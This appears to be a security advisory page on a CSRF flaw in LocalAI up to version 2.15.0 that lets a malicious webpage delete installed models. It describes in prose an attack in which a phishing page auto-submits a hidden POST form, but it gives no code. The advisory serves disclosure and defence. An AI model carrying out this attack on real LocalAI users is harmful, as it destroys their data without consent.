CSRF Vulnerability Allowing Deletion of Installed Models
A Cross-Site Request Forgery (CSRF) vulnerability in LocalAI versions up to and including 2.15.0 allows attackers to trick victims into deleting installed models. The vulnerability was demonstrated using a proof of concept (PoC) where a victim's interaction with a malicious webpage results in the deletion of the model `gpt-4-vision-preview`. The specific patch version that addresses this vulnerability is not mentioned, indicating the need for users to update to a version later than 2.15.0.
Available publicly on Jul 06 2024
Threat Overview
The vulnerability stems from the application's failure to properly validate user session or request authenticity for critical actions, such as deleting installed models. This oversight allows an attacker to craft a malicious webpage that, when visited by an authenticated user, triggers unauthorized actions on the application without the user's consent. The impact is significant as it can lead to the loss of important data (models) and potentially disrupt operations for users relying on the affected software.
Attack Scenario
An attacker crafts a webpage containing a form that, when submitted, sends a POST request to the LocalAI application to delete a specific model. The attacker then tricks a victim into visiting this page, either through phishing emails, social engineering, or embedding the page in a site visited by the victim. Upon visiting the malicious page, the form is automatically submitted using JavaScript, and the model is deleted without the victim's knowledge or explicit consent.
Who is affected
Any authenticated user of LocalAI version 2.15.0 or earlier who interacts with a malicious webpage crafted by an attacker is at risk. This includes individuals and organizations using LocalAI for managing and deploying AI models.
Technical Report
Want more out of Sightline?
Sightline offers even more for premium customers
Go Premium
We have - related security advisories that are available with Sightline Premium.